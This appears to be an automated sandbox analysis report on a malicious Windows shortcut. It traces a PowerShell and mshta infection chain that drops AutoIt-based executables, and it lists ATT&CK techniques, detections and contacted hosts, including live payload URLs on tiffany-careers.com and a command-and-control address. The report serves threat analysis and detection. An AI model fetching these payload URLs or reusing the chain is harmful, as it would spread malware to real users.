Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CEBEF8 GetSystemTimeAsFileTime,19_2_00007FF656CEBEF8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D12BCF GetUserNameW,19_2_00007FF656D12BCF
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CF2650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_00007FF656CF2650
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656CD1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,19_2_00007FF656CD1D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2567349920.00000281CB86A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs\Public\Guard.exe
Source: Guard.exe, 0000001E.00000002.3388172277.0000000001888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2567349920.00000281CB8B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2573231231.00000281CBA8A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2429762614.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2434948804.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2419847604.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2435132348.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2436049500.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2439921440.0000000004FE1000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2420041758.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2424826208.0000000001810000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000001E.00000003.2435690238.0000000001810000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: Guard.exe, 0000001E.00000002.3389847396.0000000003E26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pC:\Users\Public\Guard.exe
Source: PefjSkkhb.exe, 00000013.00000002.2359609213.00000278E57B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2573231231.00000281CBA8A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2573231231.00000281CBA49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 0000001E.00000002.3387798487.00000000015BF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3387798487.00000000015CF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3C25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: Guard.exe, 0000001E.00000002.3389847396.0000000003E26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?pC:\Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: PefjSkkhb.exe.8.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: Guard.exe.20.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D44074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,19_2_00007FF656D44074
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 19_2_00007FF656D43940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,19_2_00007FF656D43940
Source: C:\Users\Public\Guard.exeCode function: 30_2_003C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,30_2_003C696E
Source: C:\Users\Public\Guard.exeCode function: 30_2_003C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,30_2_003C6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B5696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,35_2_00B5696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B56E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,35_2_00B56E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		2
Native API		1
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares21
Input Capture		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS37
System Information Discovery		Distributed Component Object Model3
Clipboard Data		24
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
Process Injection		231
Masquerading		LSA Secrets151
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
Virtualization/Sandbox Evasion		DCSync13
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577882 Sample: R4qP4YM0QX.lnk Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 84 tiffany-careers.com 2->84 86 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->86 88 3 other IPs or domains 2->88 106 Malicious sample detected (through community Yara rule) 2->106 108 Windows shortcut file (LNK) starts blacklisted processes 2->108 110 Multi AV Scanner detection for submitted file 2->110 112 12 other signatures 2->112 10 forfiles.exe 1 2->10         started        13 msedge.exe 64 377 2->13         started        16 wscript.exe 2->16         started        18 svchost.exe 1 2 2->18         started        signatures3 process4 dnsIp5 130 Windows shortcut file (LNK) starts blacklisted processes 10->130 20 powershell.exe 7 10->20         started        23 conhost.exe 1 10->23         started        100 192.168.2.6, 443, 49700, 49704 unknown unknown 13->100 102 239.255.255.250 unknown Reserved 13->102 132 Maps a DLL or memory area into another process 13->132 25 msedge.exe 13->25         started        28 msedge.exe 13->28         started        30 msedge.exe 13->30         started        34 3 other processes 13->34 134 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->134 32 SwiftWrite.pif 16->32         started        104 127.0.0.1 unknown unknown 18->104 signatures6 process7 dnsIp8 114 Windows shortcut file (LNK) starts blacklisted processes 20->114 116 Drops PE files to the user root directory 20->116 118 Powershell drops PE file 20->118 36 PefjSkkhb.exe 20->36         started        40 mshta.exe 16 20->40         started        43 cmd.exe 20->43         started        45 2 other processes 20->45 94 googlehosted.l.googleusercontent.com 142.250.181.65, 443, 49767, 49791 GOOGLEUS United States 25->94 96 162.159.61.3, 443, 49766, 49772 CLOUDFLARENETUS United States 25->96 98 5 other IPs or domains 25->98 signatures9 process10 dnsIp11 68 C:\Users\Public\PublicProfile.ps1, ASCII 36->68 dropped 120 Windows shortcut file (LNK) starts blacklisted processes 36->120 122 Multi AV Scanner detection for dropped file 36->122 124 Suspicious powershell command line found 36->124 126 2 other signatures 36->126 47 powershell.exe 36->47         started        50 powershell.exe 36->50         started        92 tiffany-careers.com 147.45.49.155, 443, 49716, 49724 FREE-NET-ASFREEnetEU Russian Federation 40->92 70 C:\Users\user\AppData\Local\...\FILEANH[1], PE32 40->70 dropped 53 powershell.exe 14 18 40->53         started        72 C:\Users\user\AppData\...\SwiftWrite.url, MS 43->72 dropped 56 conhost.exe 43->56         started        58 msedge.exe 45->58         started        file12 signatures13 process14 dnsIp15 78 C:\Users\Public\Secure.au3, Unicode 47->78 dropped 60 Guard.exe 47->60         started        64 conhost.exe 47->64         started        90 139.99.188.124, 49776, 49802, 80 OVHFR Canada 50->90 80 C:\Users\Publicbehaviorgraphuard.exe, PE32 50->80 dropped 66 conhost.exe 50->66         started        82 C:\Users\user\AppData\Roaming\PefjSkkhb.exe, PE32+ 53->82 dropped 128 Binary is likely a compiled AutoIt script file 53->128 file16 signatures17 process18 file19 74 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 60->74 dropped 76 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 60->76 dropped 136 Windows shortcut file (LNK) starts blacklisted processes 60->136 138 Drops PE files with a suspicious file extension 60->138 signatures20

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
R4qP4YM0QX.lnk18%ReversingLabsWin32.Trojan.ForExec

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\PefjSkkhb.exe32%ReversingLabsWin32.Exploit.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://tiffany-careers.com/FILEANH90%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANH:0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANH040%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHj0%Avira URL Cloudsafe
https://tiffany-careers.com/New_2025.webp0%Avira URL Cloudsafe
https://tiffany-careers.com/T0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHH0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANH...0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHO0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHl0%Avira URL Cloudsafe
https://tiffany-careers.com/0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHLMEMH0%Avira URL Cloudsafe
https://tiffany-careers.com/PefjSkkhb.exe0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANH...C0%Avira URL Cloudsafe
http://139.99.HJ80%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHataFPS_BROWSED0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANH10%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHC:0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANH.0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHgram0%Avira URL Cloudsafe
https://tiffany-careers.com/fileanh0%Avira URL Cloudsafe
http://139.99.188.124/kiiMf0%Avira URL Cloudsafe
https://tiffany-careers.com/PefjSkkhb.exep0%Avira URL Cloudsafe
https://tiffany-careers.com/fileanhA0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHs0%Avira URL Cloudsafe
https://tiffany-careers.com/FILEANHhttps://tiffany-careers.com/FILEANHP0%Avira URL Cloudsafe
https://tiffany-careers.com0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
fg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    chrome.cloudflare-dns.com
    		172.64.41.3
    		truefalse
      		high
      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
      		94.245.104.56
      		truefalse
        		high
        googlehosted.l.googleusercontent.com
        		142.250.181.65
        		truefalse
          		high
          ax-0001.ax-msedge.net
          		150.171.27.10
          		truefalse
            		high
            fp2e7a.wpc.phicdn.net
            		192.229.221.95
            		truefalse
              		high
              tiffany-careers.com
              		147.45.49.155
              		truetrue
                		unknown
                clients2.googleusercontent.com
                		unknown
                		unknownfalse
                  		high
                  bzib.nelreports.net
                  		unknown
                  		unknownfalse
                    		high
                    nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://tse1.mm.bing.net/th?id=OADD2.10239340418563_16RSKIH5RQZW91ZBH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                        		high
                        https://tiffany-careers.com/New_2025.webpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://tse1.mm.bing.net/th?id=OADD2.10239381742050_1SU74Q4K5S59B84Q9&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90false
                          		high
                          https://tiffany-careers.com/PefjSkkhb.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://tse1.mm.bing.net/th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                            		high
                            https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                              		high
                              https://tse1.mm.bing.net/th?id=OADD2.10239340418547_1N5DXBL93QHFGMSRD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                		high
                                https://tiffany-careers.com/FILEANHtrue
                                  		unknown
                                  https://tse1.mm.bing.net/th?id=OADD2.10239340418564_10W6V5F7I280O8R44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                    		high
                                    http://139.99.188.124/kiiMftrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tse1.mm.bing.net/th?id=OADD2.10239381742051_1MZLGS7MGWEW2J3U5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://tiffany-careers.com/FILEANHHmshta.exe, 00000004.00000002.2417323073.0000022338540000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelineee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                        		high
                                        https://tiffany-careers.com/FILEANHOmshta.exe, 00000004.00000002.2415931699.0000022336C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://tiffany-careers.com/FILEANH:mshta.exe, 00000004.00000002.2416251856.0000022336C85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403505478.0000022336C85000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.last.fm/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                          		high
                                          https://tiffany-careers.com/FILEANH9mshta.exe, 00000004.00000002.2419281743.0000022B3D9F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://deff.nelreports.net/api/report?cat=msnReporting and NEL.14.drfalse
                                            		high
                                            https://www.autoitscript.com/autoit3/Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drfalse
                                              		high
                                              https://tiffany-careers.com/FILEANH...mshta.exe, 00000004.00000002.2418270268.0000022B397D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/FILEANH04mshta.exe, 00000004.00000002.2419587920.0000022B3EEC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.youtube.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                		high
                                                https://tiffany-careers.com/FILEANHjmshta.exe, 00000004.00000002.2415931699.0000022336C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.instagram.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                  		high
                                                  https://web.skype.com/?browsername=edge_canary_shorelineee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                    		high
                                                    https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2347436380.000001BE1FDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2525830239.00000281C355C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://tiffany-careers.com/Tmshta.exe, 00000004.00000003.2409159957.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416594062.0000022336CD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                          		high
                                                          https://tiffany-careers.com/FILEANHlmshta.exe, 00000004.00000002.2418270268.0000022B39803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.messenger.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                            		high
                                                            https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedgeee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                              		high
                                                              https://outlook.office.com/mail/compose?isExtension=trueee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                		high
                                                                http://139.99.HJ8powershell.exe, 0000001C.00000002.2428787870.00000281B4845000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.2306595071.000001BE0FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B34E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://i.y.qq.com/n2/m/index.htmlee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                    		high
                                                                    https://www.deezer.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                      		high
                                                                      http://www.autoitscript.com/autoit3/JGuard.exe, 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmp, Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000023.00000000.2584449237.0000000000BA9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drfalse
                                                                        		high
                                                                        https://web.telegram.org/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                          		high
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://go.micropowershell.exe, 0000001C.00000002.2428787870.00000281B465C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://tiffany-careers.com/FILEANHLMEMHmshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.13.dr, service_worker_bin_prod.js.13.drfalse
                                                                                  		high
                                                                                  https://contoso.com/Iconpowershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://tiffany-careers.com/mshta.exe, 00000004.00000003.2409159957.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416594062.0000022336CD6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://vibe.naver.com/todayee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                      		high
                                                                                      http://crl.ver)svchost.exe, 00000007.00000002.3392600093.0000016D6AE00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://assets.msn.com019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drfalse
                                                                                          		high
                                                                                          https://excel.new?from=EdgeM365Shorelineee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                            		high
                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
